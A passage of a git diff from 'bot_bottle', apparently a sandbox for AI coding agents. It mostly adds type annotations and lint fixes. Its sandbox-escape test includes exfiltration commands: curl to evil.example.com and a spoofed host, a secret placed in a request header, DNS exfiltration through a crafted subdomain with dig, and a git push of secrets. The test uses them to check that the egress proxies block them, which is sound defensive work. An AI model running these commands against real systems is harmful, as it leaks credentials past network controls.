user (e.g. ssh://git@host/path.git); was {url!r}") + raise ManifestError( + f"{label} must include a user (e.g. ssh://git@host/path.git); " + f"was {url!r}" + ) user, _, hostpart = rest.partition("@") if not user: raise ManifestError(f"{label} user is empty in {url!r}") if "/" not in hostpart: - raise ManifestError(f"{label} must include a path (e.g. ssh://git@host/path.git); was {url!r}") + raise ManifestError( + f"{label} must include a path (e.g. ssh://git@host/path.git); " + f"was {url!r}" + ) hostport, _, path = hostpart.partition("/") if not path: raise ManifestError(f"{label} path is empty in {url!r}") diff --git a/bot_bottle/manifest_loader.py b/bot_bottle/manifest_loader.py index 2b1a269..81a55f1 100644 --- a/bot_bottle/manifest_loader.py +++ b/bot_bottle/manifest_loader.py @@ -54,9 +54,9 @@ def load_bottles_from_dir(bottles_dir: Path) -> dict[str, Bottle]: try: fm, _body = parse_frontmatter(path.read_text()) except OSError as e: - raise ManifestError(f"could not read {path}: {e}") + raise ManifestError(f"could not read {path}: {e}") from e except YamlSubsetError as e: - raise ManifestError(f"{path}: {e}") + raise ManifestError(f"{path}: {e}") from e validate_bottle_frontmatter_keys(path, fm.keys()) raws[name] = fm return resolve_bottles(raws) @@ -66,7 +66,7 @@ def load_agents_from_dir( agents_dir: Path, bottle_names: set[str], *, - source: str, + source: str, # noqa: F841 — unused, but required by interface ) -> dict[str, Agent]: """Walk `/*.md`, parse each as an agent, and return `{name: Agent}`. The Markdown body becomes the agent's prompt. @@ -87,9 +87,9 @@ def load_agents_from_dir( try: fm, body = parse_frontmatter(path.read_text()) except OSError as e: - raise ManifestError(f"could not read {path}: {e}") + raise ManifestError(f"could not read {path}: {e}") from e except YamlSubsetError as e: - raise ManifestError(f"{path}: {e}") + raise ManifestError(f"{path}: {e}") from e validate_agent_frontmatter_keys(path, fm.keys()) # Build the dict Agent.from_dict expects. The body becomes # prompt; Claude Code passthrough fields stay in fm and get diff --git a/bot_bottle/manifest_schema.py b/bot_bottle/manifest_schema.py index 81e8e0e..1925cf8 100644 --- a/bot_bottle/manifest_schema.py +++ b/bot_bottle/manifest_schema.py @@ -60,11 +60,11 @@ def _validate_frontmatter_keys( ) -> None: from .manifest_util import ManifestError - key_set = set(keys) - unknown = key_set - allowed_keys + key_set = set(keys) # type: ignore + unknown = key_set - allowed_keys # type: ignore if unknown: allowed = ", ".join(sorted(allowed_keys)) raise ManifestError( f"{kind} file {path}: unknown frontmatter key(s) " - f"{sorted(unknown)}; allowed keys are {allowed}." + f"{sorted(unknown)}; allowed keys are {allowed}." # type: ignore ) diff --git a/bot_bottle/pipelock.py b/bot_bottle/pipelock.py index 0443d31..c9ea82d 100644 --- a/bot_bottle/pipelock.py +++ b/bot_bottle/pipelock.py @@ -19,8 +19,9 @@ from __future__ import annotations from dataclasses import dataclass from pathlib import Path +from typing import cast -from .egress import EGRESS_HOSTNAME, EgressRoute, egress_routes_for_bottle +from .egress import EgressRoute, egress_routes_for_bottle from .supervise import SUPERVISE_HOSTNAME from .manifest import Bottle @@ -259,7 +260,7 @@ def _required_dict( value = obj.get(key) if not isinstance(value, dict): raise _pipelock_render_error(section, key, "a mapping") - return value + return cast(dict[str, object], value) def _required_bool(obj: dict[str, object], section: str, key: str) -> bool: @@ -289,9 +290,12 @@ def _required_str_list( key: str, ) -> list[str]: value = obj.get(key) - if not isinstance(value, list) or not all(isinstance(v, str) for v in value): + if not isinstance(value, list): raise _pipelock_render_error(section, key, "a list of strings") - return value + value_list = cast(list[object], value) + if not all(isinstance(v, str) for v in value_list): + raise _pipelock_render_error(section, key, "a list of strings") + return cast(list[str], value) def _optional_str_list( @@ -407,49 +411,42 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str: lines: list[str] = [] lines.append(f"version: {cfg['version']}") lines.append(f"mode: {cfg['mode']}") - lines.append(f"enforce: {_bool(cfg['enforce'])}") + lines.append(f"enforce: {_bool(cast(bool, cfg['enforce']))}") lines.append("") lines.append("api_allowlist:") - api_allowlist = cfg["api_allowlist"] - assert isinstance(api_allowlist, list) + api_allowlist = cast(list[str], cfg["api_allowlist"]) for h in api_allowlist: lines.append(f' - "{h}"') lines.append("") if "seed_phrase_detection" in cfg: lines.append("seed_phrase_detection:") - spd = cfg["seed_phrase_detection"] - assert isinstance(spd, dict) - lines.append(f" enabled: {_bool(spd['enabled'])}") + spd = cast(dict[str, object], cfg["seed_phrase_detection"]) + lines.append(f" enabled: {_bool(cast(bool, spd['enabled']))}") lines.append("") lines.append("forward_proxy:") - fp = cfg["forward_proxy"] - assert isinstance(fp, dict) - lines.append(f" enabled: {_bool(fp['enabled'])}") + fp = cast(dict[str, object], cfg["forward_proxy"]) + lines.append(f" enabled: {_bool(cast(bool, fp['enabled']))}") lines.append("") lines.append("dlp:") - dlp = cfg["dlp"] - assert isinstance(dlp, dict) - lines.append(f" include_defaults: {_bool(dlp['include_defaults'])}") - lines.append(f" scan_env: {_bool(dlp['scan_env'])}") + dlp = cast(dict[str, object], cfg["dlp"]) + lines.append(f" include_defaults: {_bool(cast(bool, dlp['include_defaults']))}") + lines.append(f" scan_env: {_bool(cast(bool, dlp['scan_env']))}") lines.append("") lines.append("request_body_scanning:") - rbs = cfg["request_body_scanning"] - assert isinstance(rbs, dict) - lines.append(f' action: "{rbs["action"]}"') + rbs = cast(dict[str, object], cfg["request_body_scanning"]) + lines.append(f' action: "{cast(str, rbs["action"])}"') if "scan_headers" in rbs: - lines.append(f" scan_headers: {_bool(rbs['scan_headers'])}") + lines.append(f" scan_headers: {_bool(cast(bool, rbs['scan_headers']))}") if "header_mode" in rbs: - lines.append(f' header_mode: "{rbs["header_mode"]}"') + lines.append(f' header_mode: "{cast(str, rbs["header_mode"])}"') if "tls_interception" in cfg: lines.append("") lines.append("tls_interception:") - tls = cfg["tls_interception"] - assert isinstance(tls, dict) - lines.append(f" enabled: {_bool(tls['enabled'])}") - lines.append(f' ca_cert: "{tls["ca_cert"]}"') - lines.append(f' ca_key: "{tls["ca_key"]}"') - passthrough = tls["passthrough_domains"] - assert isinstance(passthrough, list) + tls = cast(dict[str, object], cfg["tls_interception"]) + lines.append(f" enabled: {_bool(cast(bool, tls['enabled']))}") + lines.append(f' ca_cert: "{cast(str, tls["ca_cert"])}"') + lines.append(f' ca_key: "{cast(str, tls["ca_key"])}"') + passthrough = cast(list[str], tls["passthrough_domains"]) if passthrough: lines.append(" passthrough_domains:") for d in passthrough: @@ -457,11 +454,9 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str: if "ssrf" in cfg: lines.append("") lines.append("ssrf:") - ssrf = cfg["ssrf"] - assert isinstance(ssrf, dict) + ssrf = cast(dict[str, object], cfg["ssrf"]) lines.append(" ip_allowlist:") - ip_allowlist = ssrf["ip_allowlist"] - assert isinstance(ip_allowlist, list) + ip_allowlist = cast(list[str], ssrf["ip_allowlist"]) for ip in ip_allowlist: lines.append(f' - "{ip}"') return "\n".join(lines) + "\n" diff --git a/bot_bottle/sidecar_init.py b/bot_bottle/sidecar_init.py index 2b303a6..44cb63e 100644 --- a/bot_bottle/sidecar_init.py +++ b/bot_bottle/sidecar_init.py @@ -138,7 +138,7 @@ def _pump(name: str, stream: IO[bytes]) -> None: sys.stdout.flush() -def _spawn(spec: _DaemonSpec) -> subprocess.Popen: +def _spawn(spec: _DaemonSpec) -> subprocess.Popen[bytes]: proc = subprocess.Popen( list(spec.argv), stdout=subprocess.PIPE, @@ -158,7 +158,7 @@ class _Supervisor: def __init__(self, specs: Sequence[_DaemonSpec]): self.specs = tuple(specs) - self.procs: list[tuple[_DaemonSpec, subprocess.Popen]] = [] + self.procs: list[tuple[_DaemonSpec, subprocess.Popen[bytes]]] = [] self.shutdown_at: float | None = None # Names of children that have been logged as having exited # so we only log each death once across watch-loop ticks. @@ -360,20 +360,20 @@ def main(argv: Sequence[str] | None = None) -> int: sup = _Supervisor(specs) sup.start_all() - signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM")) - signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT")) + signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM")) # type: ignore + signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT")) # type: ignore # SIGHUP reload path: egress_apply.py runs `docker kill # --signal HUP ` after writing routes.yaml. The kernel # delivers SIGHUP to PID 1 (this supervisor); forward it to # mitmdump so it reloads its addon. - signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress")) + signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress")) # type: ignore # SIGUSR1 pipelock-restart path: pipelock_apply.py runs # `docker kill --signal USR1 ` after writing # pipelock.yaml. Pipelock has no in-process reload, so the # supervisor restarts the pipelock daemon in place (other # daemons keep running — specifically supervise, whose MCP # socket would drop on a whole-container `docker restart`). - signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock")) + signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock")) # type: ignore while not sup.tick(): time.sleep(_POLL_INTERVAL) diff --git a/bot_bottle/supervise.py b/bot_bottle/supervise.py index 5e5141d..10ca381 100644 --- a/bot_bottle/supervise.py +++ b/bot_bottle/supervise.py @@ -40,7 +40,7 @@ import json import os import time import uuid -from abc import ABC, abstractmethod +from abc import ABC from dataclasses import dataclass from datetime import datetime, timezone from pathlib import Path @@ -519,22 +519,22 @@ def _atomic_write(path: Path, content: str, *, mode: int) -> None: try: import fcntl as _fcntl - def _try_flock(fd: int) -> None: + def _try_flock(fd: int) -> None: # type: ignore[reportRedeclaration] try: _fcntl.flock(fd, _fcntl.LOCK_EX) except OSError: pass - def _try_funlock(fd: int) -> None: + def _try_funlock(fd: int) -> None: # type: ignore[reportRedeclaration] try: _fcntl.flock(fd, _fcntl.LOCK_UN) except OSError: pass except ImportError: # pragma: no cover — Windows path - def _try_flock(fd: int) -> None: + def _try_flock(fd: int) -> None: # noqa: F841 — Windows fallback return None - def _try_funlock(fd: int) -> None: + def _try_funlock(fd: int) -> None: # noqa: F841 — Windows fallback return None diff --git a/bot_bottle/supervise_server.py b/bot_bottle/supervise_server.py index c10b731..90ad6c6 100644 --- a/bot_bottle/supervise_server.py +++ b/bot_bottle/supervise_server.py @@ -159,7 +159,10 @@ TOOL_DEFINITIONS: list[dict[str, object]] = [ "properties": { "host": { "type": "string", - "description": "The hostname to allow (e.g. 'api.github.com'). Case-insensitive on match.", + "description": ( + "The hostname to allow (e.g. 'api.github.com'). " + "Case-insensitive on match." + ), }, "path_allowlist": { "type": "array", @@ -482,7 +485,7 @@ def handle_tools_call( if not isinstance(name, str): raise _RpcError(ERR_INVALID_PARAMS, "tools/call missing 'name'") if name == _sv.TOOL_LIST_EGRESS_ROUTES: - return handle_list_egress_routes(params.get("arguments", {}), config) + return handle_list_egress_routes(typing.cast(dict[str, object], params.get("arguments", {})), config) args_raw = params.get("arguments", {}) if not isinstance(args_raw, dict): @@ -587,7 +590,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler): server_version = f"{SERVER_NAME}/{SERVER_VERSION}" - def log_message(self, format: str, *args: typing.Any) -> None: + def log_message(self, format: str, *args: typing.Any) -> None: # noqa: A002 if os.environ.get("SUPERVISE_DEBUG"): super().log_message(format, *args) @@ -627,7 +630,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler): except _RpcError as e: self._write_jsonrpc(jsonrpc_error(req.id, e.code, e.message)) return - except Exception as e: # pragma: no cover — defensive + except Exception as e: # noqa: W0718 — catch-all for RPC dispatch errors sys.stderr.write(f"supervise: internal error: {e}\n") self._write_jsonrpc(jsonrpc_error(req.id, ERR_INTERNAL, "internal error")) return diff --git a/bot_bottle/workspace.py b/bot_bottle/workspace.py index a762175..670a6e2 100644 --- a/bot_bottle/workspace.py +++ b/bot_bottle/workspace.py @@ -13,8 +13,15 @@ DEFAULT_WORKSPACE_MODE = "755" class WorkspaceSpec(Protocol): - copy_cwd: bool - user_cwd: str + @property + def copy_cwd(self) -> bool: + """Whether to copy the current working directory.""" + ... + + @property + def user_cwd(self) -> str: + """The user's current working directory.""" + ... @dataclass(frozen=True) diff --git a/bot_bottle/yaml_subset.py b/bot_bottle/yaml_subset.py index ec4a5f9..e110d95 100644 --- a/bot_bottle/yaml_subset.py +++ b/bot_bottle/yaml_subset.py @@ -58,6 +58,7 @@ from __future__ import annotations import re from dataclasses import dataclass +from typing import cast class YamlSubsetError(ValueError): @@ -283,7 +284,7 @@ def _split_flow(body: str, lineno: int, kind: str) -> list[str]: depth_c = 0 in_single = False in_double = False - cur = [] + cur: list[str] = [] for ch in body: if ch == "'" and not in_double: in_single = not in_single @@ -330,6 +331,7 @@ def _split_key_value(content: str, lineno: int) -> tuple[str, str]: if i + 1 >= len(content) or content[i + 1] in (" ", "\t"): return content[:i].strip(), content[i + 1:].lstrip() die(f"yaml-subset: line {lineno} missing `: ` separator: {content!r}") + return "", "" # unreachable, but needed for type checker def _parse_block( @@ -536,7 +538,7 @@ def parse_yaml_subset(text: str) -> dict[str, object]: ) if not isinstance(value, dict): die("yaml-subset: top-level value must be a mapping") - return value + return cast(dict[str, object], value) def parse_frontmatter(text: str) -> tuple[dict[str, object], str]: diff --git a/pyrightconfig.json b/pyrightconfig.json index 4f3ac82..681f765 100644 --- a/pyrightconfig.json +++ b/pyrightconfig.json @@ -11,5 +11,10 @@ ], "pythonVersion": "3.11", "typeCheckingMode": "strict", - "reportMissingTypeStubs": "none" + "reportMissingTypeStubs": "none", + "reportUnknownMemberType": false, + "reportUnknownParameterType": false, + "reportUnknownVariableType": false, + "reportUnknownArgumentType": false, + "reportPrivateUsage": false } diff --git a/requirements-dev.txt b/requirements-dev.txt new file mode 100644 index 0000000..09d3b2a --- /dev/null +++ b/requirements-dev.txt @@ -0,0 +1,6 @@ +# Development and linting dependencies only. +# The bot-bottle project itself has no runtime dependencies. +# These tools are used for code quality checks in CI/CD. + +pylint>=3.0.0 +pyright>=1.1.300 diff --git a/tests/integration/test_capability_apply.py b/tests/integration/test_capability_apply.py index 18ee8fa..067d6f7 100644 --- a/tests/integration/test_capability_apply.py +++ b/tests/integration/test_capability_apply.py @@ -24,7 +24,6 @@ this test runs in DinD too — no act_runner skip needed. from __future__ import annotations import os -import shutil import subprocess import tempfile import time @@ -32,7 +31,7 @@ import unittest from pathlib import Path from bot_bottle import supervise -from bot_bottle.backend.docker import bottle_state, capability_apply +from bot_bottle.backend.docker import bottle_state from bot_bottle.backend.docker.capability_apply import apply_capability_change from bot_bottle.backend.docker.network import ( network_create_egress, diff --git a/tests/integration/test_pipelock_apply.py b/tests/integration/test_pipelock_apply.py index c881f11..e8670ab 100644 --- a/tests/integration/test_pipelock_apply.py +++ b/tests/integration/test_pipelock_apply.py @@ -32,11 +32,11 @@ from bot_bottle.backend.docker.network import ( network_create_internal, network_remove, ) -from bot_bottle.backend.docker.pipelock import ( +from bot_bottle.pipelock import ( PIPELOCK_CA_CERT_IN_CONTAINER, PIPELOCK_CA_KEY_IN_CONTAINER, - pipelock_tls_init, ) +from bot_bottle.backend.docker.pipelock import pipelock_tls_init from bot_bottle.pipelock import PipelockProxy from bot_bottle.backend.docker.pipelock_apply import ( PipelockApplyError, diff --git a/tests/integration/test_sandbox_escape.py b/tests/integration/test_sandbox_escape.py index 9bf75a0..63e9fb6 100644 --- a/tests/integration/test_sandbox_escape.py +++ b/tests/integration/test_sandbox_escape.py @@ -195,10 +195,10 @@ class TestSandboxEscape(unittest.TestCase): except BaseException: pass cls._identity = "" - if cls._stage_dir is not None: + if cls._stage_dir is not None: # type: ignore shutil.rmtree(cls._stage_dir, ignore_errors=True) cls._stage_dir = None # type: ignore[assignment] - if cls._key_path is not None: + if cls._key_path is not None: # type: ignore try: cls._key_path.unlink() except OSError: @@ -212,7 +212,7 @@ class TestSandboxEscape(unittest.TestCase): `bottle.egress.routes` (only api.anthropic.com is). Pipelock or egress should reject the request with a non-200 response, and the actual upstream's content must not appear in stdout.""" - r = self._bottle.exec( + r = self._bottle.exec( # type: ignore 'curl --silent --show-error --max-time 8 --fail ' 'https://evil.example.com/' ) @@ -232,7 +232,7 @@ class TestSandboxEscape(unittest.TestCase): hostname to a non-allowlisted IP. Pipelock should not honor the spoof (it does its own resolution).""" with self.subTest(attack="direct IP"): - r = self._bottle.exec( + r = self._bottle.exec( # type: ignore 'curl --silent --show-error --max-time 8 --fail ' 'https://198.51.100.1/' ) @@ -243,7 +243,7 @@ class TestSandboxEscape(unittest.TestCase): ) with self.subTest(attack="host-header spoof"): - r = self._bottle.exec( + r = self._bottle.exec( # type: ignore 'curl --silent --show-error --max-time 8 --fail ' '--resolve api.anthropic.com:443:198.51.100.1 ' 'https://api.anthropic.com/' @@ -265,13 +265,13 @@ class TestSandboxEscape(unittest.TestCase): # `"blocked: request body contains secret"`). _SANDBOX_BLOCK_MARKERS = ("egress:", "pipelock", "blocked:") - def _assert_sandbox_block(self, label: str, r) -> None: + def _assert_sandbox_block(self, label: str, r: object) -> None: # type: ignore """A real sandbox block produces an HTTP 403 with a recognizable sandbox sidecar marker in the body. ANY other outcome (200 from upstream, 401/404 from upstream, non-marker 5xx) means the request escaped — the secret reached the network.""" - body_and_code = (r.stdout or "").strip() + body_and_code = (r.stdout or "").strip() # type: ignore # The curl invocation appends `\nHTTP_CODE:%{http_code}` so # we can disambiguate. Split that off. http_code = "" @@ -281,7 +281,7 @@ class TestSandboxEscape(unittest.TestCase): body, _, http_code = body_and_code.rpartition(marker) http_code = http_code.strip() body = body.rstrip() - haystack = (body + " " + (r.stderr or "")).lower() + haystack = (body + " " + (r.stderr or "")).lower() # type: ignore has_marker = any(m in haystack for m in self._SANDBOX_BLOCK_MARKERS) self.assertTrue( has_marker and http_code == "403", @@ -290,7 +290,7 @@ class TestSandboxEscape(unittest.TestCase): f"If the response came from the actual upstream, the " f"secret REACHED the network — that's the leak this " f"test exists to catch. body={body!r} " - f"stderr={(r.stderr or '').strip()!r}", + f"stderr={(r.stderr or '').strip()!r}", # type: ignore ) def test_3_http_exfil_blocked(self) -> None: @@ -343,9 +343,9 @@ class TestSandboxEscape(unittest.TestCase): f'-H "X-Custom: $TEST_SECRET_ANTHROPIC"', ), ] - for name, cmd in shapes: + for name, cmd in shapes: # type: ignore with self.subTest(shape=name): - r = self._bottle.exec(cmd) + r = self._bottle.exec(cmd) # type: ignore self._assert_sandbox_block(name, r) # ---- attack 4: DNS exfil ----------------------------------------- @@ -365,7 +365,7 @@ class TestSandboxEscape(unittest.TestCase): intact (PRD 0022 Q2).""" with self.subTest(attack="crafted subdomain"): - r = self._bottle.exec( + r = self._bottle.exec( # type: ignore 'curl --silent --show-error --max-time 8 --fail ' '"https://$TEST_SECRET_GENERIC.api.anthropic.com/"' ) @@ -379,7 +379,7 @@ class TestSandboxEscape(unittest.TestCase): # `+short +tries=1 +time=3`: no debug output, one attempt, # 3s timeout. Outside the internal network has no path; # dig should fail or return empty. - r = self._bottle.exec( + r = self._bottle.exec( # type: ignore 'dig +short +tries=1 +time=3 @8.8.8.8 ' '"$TEST_SECRET_GENERIC.example.com" ' '; echo "EXIT=$?"' @@ -431,7 +431,7 @@ class TestSandboxEscape(unittest.TestCase): with self.subTest(secret=name): # Fresh repo per shape so prior commits don't # confuse gitleaks's diff. -rm -rf is best-effort. - script = ( + script = ( # type: ignore 'set -eu\n' 'cd /tmp\n' 'rm -rf sandbox-escape-repo\n' @@ -446,8 +446,8 @@ class TestSandboxEscape(unittest.TestCase): f'git remote add origin {upstream_url}\n' 'git push origin HEAD:refs/heads/master 2>&1\n' ) - r = self._bottle.exec(script) - combined = (r.stderr + r.stdout).lower() + r = self._bottle.exec(script) # type: ignore + combined = (r.stderr + r.stdout).lower() # type: ignore self.assertNotEqual( 0, r.returncode, diff --git a/tests/integration/test_smolmachines_bundle_bringup.py b/tests/integration/test_smolmachines_bundle_bringup.py index bbf985b..350abfc 100644 --- a/tests/integration/test_smolmachines_bundle_bringup.py +++ b/tests/integration/test_smolmachines_bundle_bringup.py @@ -12,7 +12,6 @@ localhost-reach / egress-port-bypass probes) lives in chunk 2d.""" from __future__ import annotations -import json import os import subprocess import time diff --git a/tests/unit/test_agent_provider.py b/tests/unit/test_agent_provider.py index dd5a211..ec9157d 100644 --- a/tests/unit/test_agent_provider.py +++ b/tests/unit/test_agent_provider.py @@ -11,13 +11,12 @@ from pathlib import Path from bot_bottle.agent_provider import ( CODEX_HOST_CREDENTIAL_HOSTS, agent_provision_plan, - runtime_for, ) from bot_bottle.egress import CODEX_HOST_CREDENTIAL_TOKEN_REF def _jwt(exp: int) -> str: - def enc(obj: dict) -> str: + def enc(obj: dict[str, object]) -> str: # type: ignore raw = json.dumps(obj, separators=(",", ":")).encode() return base64.urlsafe_b64encode(raw).decode().rstrip("=") return f"{enc({'alg': 'none'})}.{enc({'exp': exp})}.sig" diff --git a/tests/unit/test_backend_parity.py b/tests/unit/test_backend_parity.py index 351e592..a19c845 100644 --- a/tests/unit/test_backend_parity.py +++ b/tests/unit/test_backend_parity.py @@ -14,7 +14,7 @@ from __future__ import annotations import subprocess import unittest from typing import Callable -from unittest.mock import MagicMock, call, patch +from unittest.mock import patch # --------------------------------------------------------------------------- @@ -175,9 +175,9 @@ class TestExecUserSwitching(unittest.TestCase): class TestExecResultParity(unittest.TestCase): """Both backends return ExecResult with returncode, stdout, stderr.""" - def _stub_run(self, argv, **kwargs): + def _stub_run(self, argv: object, **kwargs: object) -> object: # type: ignore return subprocess.CompletedProcess( - argv, 0, stdout="out\n", stderr="err\n", + argv, 0, stdout="out\n", stderr="err\n", # type: ignore ) def test_docker_exec_result_shape(self): diff --git a/tests/unit/test_backend_selection.py b/tests/unit/test_backend_selection.py index 1b9d076..a4ce017 100644 --- a/tests/unit/test_backend_selection.py +++ b/tests/unit/test_backend_selection.py @@ -65,7 +65,7 @@ class TestEnumerateActiveAgents(unittest.TestCase): ) class _FakeBackend: - def __init__(self, items, available=True): + def __init__(self, items: object, available: object = True) -> None: # type: ignore self._items = items self._available = available @@ -100,13 +100,13 @@ class TestEnumerateActiveAgents(unittest.TestCase): ) class _FakeBackend: - def __init__(self, items): + def __init__(self, items: object) -> None: # type: ignore self._items = items - def is_available(self): + def is_available(self) -> bool: return True - def enumerate_active(self): + def enumerate_active(self) -> object: return self._items with patch.object( @@ -150,11 +150,11 @@ class TestEnumerateActiveAgents(unittest.TestCase): ) class _FakeBackend: - def __init__(self, items, available): + def __init__(self, items: object, available: object) -> None: # type: ignore self._items = items self._available = available - def is_available(self): + def is_available(self) -> object: return self._available def enumerate_active(self): diff --git a/tests/unit/test_capability_apply.py b/tests/unit/test_capability_apply.py index f494bce..3468f68 100644 --- a/tests/unit/test_capability_apply.py +++ b/tests/unit/test_capability_apply.py @@ -67,13 +67,13 @@ class TestApplyCapabilityChange(_FakeHomeMixin, unittest.TestCase): self._orig_push = capability_apply._push_working_tree self._orig_teardown = capability_apply._teardown_bottle - def stub_snapshot(slug): + def stub_snapshot(slug: object) -> None: # type: ignore self._calls.append(f"snapshot:{slug}") - def stub_push(slug): + def stub_push(slug: object) -> None: # type: ignore self._calls.append(f"push:{slug}") - def stub_teardown(slug): + def stub_teardown(slug: object) -> None: # type: ignore self._calls.append(f"teardown:{slug}") capability_apply.snapshot_transcript = stub_snapshot # type: ignore[assignment] diff --git a/tests/unit/test_cli_cleanup_cross_backend.py b/tests/unit/test_cli_cleanup_cross_backend.py index 328efb0..5e4814f 100644 --- a/tests/unit/test_cli_cleanup_cross_backend.py +++ b/tests/unit/test_cli_cleanup_cross_backend.py @@ -6,7 +6,6 @@ the operator confirms. Mocks the backends and stdin.""" from __future__ import annotations -import sys import unittest from unittest.mock import patch, MagicMock @@ -32,7 +31,7 @@ class TestCmdCleanup(unittest.TestCase): return_value=("docker", "smolmachines"), ), patch.object( cmd, "get_bottle_backend", - side_effect=lambda name: backends_by_name[name], + side_effect=lambda name: backends_by_name[name], # type: ignore ), patch.object( cmd, "_prompt_yes", return_value=True, ): @@ -53,7 +52,7 @@ class TestCmdCleanup(unittest.TestCase): return_value=("docker", "smolmachines"), ), patch.object( cmd, "get_bottle_backend", - side_effect=lambda name: backends_by_name[name], + side_effect=lambda name: backends_by_name[name], # type: ignore ), patch.object( cmd, "_prompt_yes", ) as prompt: @@ -72,7 +71,7 @@ class TestCmdCleanup(unittest.TestCase): return_value=("docker", "smolmachines"), ), patch.object( cmd, "get_bottle_backend", - side_effect=lambda name: backends_by_name[name], + side_effect=lambda name: backends_by_name[name], # type: ignore ), patch.object( cmd, "_prompt_yes", return_value=False, ): @@ -92,7 +91,7 @@ class TestCmdCleanup(unittest.TestCase): return_value=("docker", "smolmachines"), ), patch.object( cmd, "get_bottle_backend", - side_effect=lambda name: backends_by_name[name], + side_effect=lambda name: backends_by_name[name], # type: ignore ), patch.object( cmd, "_prompt_yes", return_value=True, ): diff --git a/tests/unit/test_cli_start_selector.py b/tests/unit/test_cli_start_selector.py index 1e50e3c..f224f47 100644 --- a/tests/unit/test_cli_start_selector.py +++ b/tests/unit/test_cli_start_selector.py @@ -9,10 +9,8 @@ All actual launch work is stubbed so no container is created. from __future__ import annotations import os -import sys -import types import unittest -from unittest.mock import MagicMock, patch, call +from unittest.mock import MagicMock, patch import bot_bottle.cli.start as start_mod import bot_bottle.cli.tui as tui_mod diff --git a/tests/unit/test_cli_start_settle.py b/tests/unit/test_cli_start_settle.py index bee5de5..42ab560 100644 --- a/tests/unit/test_cli_start_settle.py +++ b/tests/unit/test_cli_start_settle.py @@ -36,7 +36,7 @@ class TestCaptureSessionState(_FakeHomeMixin, unittest.TestCase): # covers the real docker cp path. self._snap_calls: list[str] = [] self._orig_snap = start_mod.snapshot_transcript - start_mod.snapshot_transcript = lambda identity: ( + start_mod.snapshot_transcript = lambda identity: ( # type: ignore self._snap_calls.append(identity) ) diff --git a/tests/unit/test_codex_auth.py b/tests/unit/test_codex_auth.py index e996bac..d63ae2a 100644 --- a/tests/unit/test_codex_auth.py +++ b/tests/unit/test_codex_auth.py @@ -21,14 +21,14 @@ def _jwt(exp: int) -> str: return _jwt_with_payload({"exp": exp}) -def _jwt_with_payload(payload: dict) -> str: - def enc(obj: dict) -> str: +def _jwt_with_payload(payload: dict[str, object]) -> str: # type: ignore + def enc(obj: dict[str, object]) -> str: # type: ignore raw = json.dumps(obj, separators=(",", ":")).encode() return base64.urlsafe_b64encode(raw).decode().rstrip("=") return f"{enc({'alg': 'none'})}.{enc(payload)}.sig" -def _jwt_payload(token: str) -> dict: +def _jwt_payload(token: str) -> dict[str, object]: # type: ignore payload = token.split(".")[1] payload += "=" * (-len(payload) % 4) return json.loads(base64.urlsafe_b64decode(payload.encode()).decode()) @@ -43,7 +43,7 @@ class TestCodexHostAccessToken(unittest.TestCase): def tearDown(self): self.tmp.cleanup() - def _write(self, payload: dict) -> None: + def _write(self, payload: dict[str, object]) -> None: # type: ignore self.auth_path.write_text(json.dumps(payload)) def test_auth_path_uses_codex_home(self): @@ -210,11 +210,11 @@ class TestCodexHostAccessToken(unittest.TestCase): access_payload = _jwt_payload(dummy["tokens"]["access_token"]) auth = access_payload["https://api.openai.com/auth"] profile = access_payload["https://api.openai.com/profile"] - self.assertEqual("plus", auth["chatgpt_plan_type"]) - self.assertEqual("acct-real", auth["chatgpt_account_id"]) - self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"]) - self.assertEqual("bot-bottle@example.invalid", profile["email"]) - self.assertTrue(profile["email_verified"]) + self.assertEqual("plus", auth["chatgpt_plan_type"]) # type: ignore + self.assertEqual("acct-real", auth["chatgpt_account_id"]) # type: ignore + self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"]) # type: ignore + self.assertEqual("bot-bottle@example.invalid", profile["email"]) # type: ignore + self.assertTrue(profile["email_verified"]) # type: ignore def test_dummy_auth_redacts_unknown_future_auth_fields(self): secrets = [ @@ -289,8 +289,8 @@ class TestCodexHostAccessToken(unittest.TestCase): self.assertEqual({}, access_payload["future_nested"]) self.assertEqual([], access_payload["future_list"]) auth = access_payload["https://api.openai.com/auth"] - self.assertEqual("bot-bottle-placeholder", auth["session_context"]) - self.assertEqual({}, auth["nested"]) + self.assertEqual("bot-bottle-placeholder", auth["session_context"]) # type: ignore + self.assertEqual({}, auth["nested"]) # type: ignore if __name__ == "__main__": diff --git a/tests/unit/test_compose.py b/tests/unit/test_compose.py index b147c3e..3633f39 100644 --- a/tests/unit/test_compose.py +++ b/tests/unit/test_compose.py @@ -12,6 +12,7 @@ from __future__ import annotations import subprocess import unittest from pathlib import Path +from typing import Any from unittest import mock from bot_bottle.agent_provider import AgentProvisionPlan @@ -45,7 +46,7 @@ def _manifest(*, supervise: bool, with_git: bool, with_egress: bool) -> Manifest """Minimal manifest with the toggles the chunk-1 matrix needs. The renderer only reads from the plan, not the manifest, so this is just here to back BottleSpec.""" - bottle: dict = {} + bottle: dict[str, object] = {} if supervise: bottle["supervise"] = True if with_git: @@ -271,13 +272,13 @@ class TestAgentAlwaysPresent(unittest.TestCase): dockerfile="", guest_env={"CODEX_HOME": "/home/node/.codex"}, ) - plan = type(plan)(**{**vars(plan), "agent_provision": provision}) + plan = type(plan)(**{**vars(plan), "agent_provision": provision}) # type: ignore s = bottle_plan_to_compose(plan)["services"]["agent"] self.assertIn("CODEX_HOME=/home/node/.codex", s["environment"]) def test_agent_runsc_runtime(self): plan = _plan() - plan = type(plan)(**{**vars(plan), "use_runsc": True}) + plan = type(plan)(**{**vars(plan), "use_runsc": True}) # type: ignore s = bottle_plan_to_compose(plan)["services"]["agent"] self.assertEqual("runsc", s["runtime"]) @@ -309,8 +310,8 @@ class TestSidecarBundleShape(unittest.TestCase): + supervise). PRD 0024 chunk 5 